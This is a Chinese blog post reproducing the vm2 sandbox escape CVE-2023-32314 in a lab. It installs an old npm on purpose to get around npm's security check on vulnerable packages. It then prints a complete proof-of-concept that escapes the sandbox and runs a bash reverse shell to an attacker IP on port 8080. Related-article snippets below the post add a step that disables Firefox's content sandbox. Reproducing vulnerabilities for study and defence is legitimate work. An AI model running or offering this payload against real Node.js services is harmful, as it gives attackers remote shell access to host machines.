漏洞实现 --- Vm2沙箱逃逸漏洞复现(CVE-2023-32314)

最新推荐文章于 2024-07-23 15:42:50 发布
最新推荐文章于 2024-07-23 15:42:50 发布
阅读量4.9k 收藏 1
点赞数 1
分类专栏: 漏洞攻击 文章标签: 安全 web安全 运维 xss https
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62443409/article/details/132736565
版权

Vm2沙箱逃逸漏洞复现

CentOS7(Nodejs和vm@3.9.17)

PS:安装低版本npm是为了规避npm的内部审核机制(高版本npm会检查vm2安装包的安全性)

(1)流程

  1. 低版本nodejs + 低版本npm
  2. 利用低版本npm安装vm@3.9.17
  3. 升级至高版本nodejs
  4. 复现漏洞

(2)开始操作

  • 安装低版本nodejs + 低版本npm
 wget http://nodejs.org/dist/v0.10.25/node-v0.10.25.tar.gz --- 解压
 mv node-v0.10.25-linux-x64 /usr/local/nodejs --- 更改名称
 ./configure --prefix=/usr/local/nodejs --- 配置目录
 make && make install --- 编译安装
 ln -s /usr/local/nodejs/bin/node /usr/local/bin --- 建立node软链接
 ln -s /usr/local/nodejs/bin/npm /usr/local/bin --- 建立npm软链接
 npm config set registry https://registry.npm.taobao.org --- 设置镜像源
 npm config list --- 查看设置信息

查看版本

安装gcc

  • 利用低版本npm安装vm2@3.9.17
npm install vm2@3.9.17

  • 升级nodejs至高版本

安装nvm

配置环境变量,使得环境变量生效

nvm list-remote --- 查看版本
nvm install v16.18.1 --- 安装指定版本
nvm use v16.18.1 --- 切换至指定版本
node --version --- 查看版本

最终复现环境所需版本

(3)漏洞复现

  • poc
const { VM } = require("vm2");
const vm = new VM();
 
const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("bash -i >& /dev/tcp/192.168.174.123/8080 0>&1").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;
 
console.log(vm.run(code));
  • 将poc写入js文件,并运行


  • 攻击机监听端口,执行1.js文件


  • 反弹成功

雨天_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vm2沙箱逃逸漏洞复现(CVE-2023-32314)
0xSec
05-19 2544
3.9.17 及以下版本的vm2中存在沙盒逃逸漏洞。它滥用基于代理规范的宿主对象的意外创建,并允许Function在宿主上下文中通过 导致RCE。
浅谈NPM,vm,vm2,Node.js沙盒逃逸
m0_62063669的博客
06-24 3040
浅谈NPM,vm,vm2,Node.js沙盒逃逸( npm是用 JavaScript 写的,运行在 Node.js 上,Node.js 内置了 npm,npm 的发展是跟 Node.js 的发展相辅相成的。)简单来说, Node.js 就是运行在服务端的JavaScript,npm是随同Node.js一起安装的包管理工具,通过命令从npm服务器下载别人编写的第三方工具到本地使用。但是VM不安全,能轻易地获取到了主程序的全局对象 process,最终控制主程序!因此VM2诞生,解决了VM的安全问题。 ..
漏洞复现CVE-2024-4257 蓝网科技临床浏览系统SQL注入
失心少年
05-01 680
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!这会影响文件/xds/deleteStudy.php的未知部分。蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。
NodeJS VM2沙箱逃逸漏洞分析【CVE-2023-32314
R3s3arcm的博客
08-21 372
Node.js 是一个基于 V8 引擎的开源、跨平台的 JavaScript 运行环境,它可以在多个操作系统上运行,包括 Windows、macOS 和 Linux 等。Node.js 提供了一个运行在服务器端的 JavaScript 环境,使得开发者可以编写并发的、高效的服务器端应用程序。Node.js 使用事件驱动、非阻塞 I/O 模型来支持并发运行。它支持通过插件扩展 API,以及通过 npm(Node.js 包管理器) 安装其他插件和模块。
NodeJS VM2沙箱逃逸漏洞分析【CVE-2023-29199】
R3s3arcm的博客
09-05 392
Node.js 是一个基于 V8 引擎的开源、跨平台的 JavaScript 运行环境,它可以在多个操作系统上运行,包括 Windows、macOS 和 Linux 等。Node.js 提供了一个运行在服务器端的 JavaScript 环境,使得开发者可以编写并发的、高效的服务器端应用程序。Node.js 使用事件驱动、非阻塞 I/O 模型来支持并发运行。它支持通过插件扩展 API,以及通过 npm(Node.js 包管理器) 安装其他插件和模块。
【严重】vm2 <3.9.15 沙箱逃逸漏洞CVE-2023-29017)
murphysec的博客
04-13 1273
vm2 是一个沙箱,用于在 Node.js 环境中运行不受信任的代码。宿主对象(Host objects)是指由 Node.js 的宿主环境提供的对象,例如全局对象、文件系统或网络请求等。 vm2 3.9.15之前版本中,当处理异步错误时未正确处理 Error.prepareStackTrace 的宿主对象,攻击者可利用该漏洞绕过沙箱保护,在运行沙箱的主机上远程执行任意代码。
【高危】vm2 <3.9.16 沙箱逃逸漏洞CVE-2023-29199)
murphysec的博客
04-18 1065
vm2 是一个基于 Node.js 的沙箱环境,可以使用列入白名单的 Node 内置模块运行不受信任的代码。 vm2 3.9.16之前版本中,由于transformer.js中transformer函数中异常处理逻辑不够完善,攻击者可通过制造异常绕过handleException()并造成主机异常且泄露到沙箱中进而绕过沙箱实现任意代码执行。 该漏洞已存在POC。
【高危】vm2 <3.9.17 沙箱逃逸漏洞(POC)(CVE-2023-30547 )
murphysec的博客
04-18 1050
vm2 是一个基于 Node.js 的沙箱环境,可以使用列入白名单的 Node 内置模块运行不受信任的代码。 由于 CVE-2023-29199 的修复不完整,vm2 3.9.17 之前版本的 transformer.js 文件中的 transformer 函数异常处理逻辑存在缺陷。攻击者可以利用这个缺陷,在 handleException() 函数中构造一个主机异常,从而绕过沙箱限制,实现在主机中执行任意代码的攻击。 该漏洞已存在POC。
vm2 组件存在沙箱逃逸漏洞
OSCS开源安全社区
09-07 1197
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。同时提供漏洞、投毒情报的免费订阅服务,社区用户可通过配置飞书、钉钉、企业微信机器人,及时获得一手情报信息推送。点击漏洞详情页右下方【免费使用】,即可快速体验墨菲安全专业的检测能力。提供代码安全检测、许可证合规评估等能力,目前支持 CLI 、IDE插件、GitHub多种检测方式,欢迎使用。受影响版本的 vm2 中,攻击者可以绕过沙箱的保护,在沙箱运行的主机上获得远程代码执行的权限。
速修复!VM2 库中又出现严重的沙箱逃逸漏洞
smellycat000的专栏
04-19 755
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现了另外一个沙箱逃逸漏洞,可被用于在运行 VM2 沙箱上运行的主机上执行不安全的代码。VM2 是大量软件工具使用的特定 JavaScript 沙箱,用于在隔离环境中运行并测试不受信任的代码,阻止代码访问主机的系统资源或外部数据。VM2 库常见于 IDEs、代码编辑器、安全工具和多种渗透测试框架中,在 NPM 包仓库中每个月的下载量达到数...
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
标题中的“逃逸IE浏览器沙箱-在野0Day漏洞利用复现”指的是针对Internet Explorer(IE)浏览器的安全研究,特别是关于如何利用未公开(0Day)漏洞来突破浏览器的安全沙箱机制。沙箱是一种安全措施,它限制了恶意代码...
the-java-tutorials:Oracle 的 Java 教程沙箱
06-16
java教程这个包包含来自 Oracle 的教程(见上文)。 目录结构已设置为镜像 Java 教程 URL 路径。 例如: http://docs.oracle.com/javase/tutorial/getStarted/cupojava/index.html的教程 URL 的包目录路径为./the-...
home-sandbox:JS家庭自动化沙箱
05-19
家 :houses: 自动化 :robot: 沙盒 :collision: 这是一个实验。 如果您打算使用此功能,请不要使用。 但是,如果您好奇的话,这是一个运行在Raspberry Pi上的JS家庭自动化项目(功能齐全),它支持IKEA智能物件,小米...
webcgi-exploits:多语言Web CGI界面漏洞利用
05-13
Web CGI漏洞利用 这是与不同的Web CGI相关的几种漏洞利用。 我在过去几年中写过这些漏洞。 这个怎么运作 Web应用程序基本上就是这些层: 应用领域 网络框架 脚本语言引擎 Web容器(服务器) 网络前端代理(nginx...
行业资料-交通装置-一种沙箱吊车平衡杆.zip
08-21
行业资料-交通装置-一种沙箱吊车平衡杆.zip
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 636
轻量部署,安全和业务连续性才能两不误
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 236
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
内网安全:IPC横向
最新发布
8888的博客
07-23 651
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
cve-2021-3618漏洞复现
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞复现步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修复已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 现在,你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果复现成功,可能会出现安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出现异常行为,可能是因为已经修复了该漏洞或在你的环境中无法成功利用。 需要注意的是,复现CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施复现操作之前,请确认你已经了解并接受相关风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨天_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值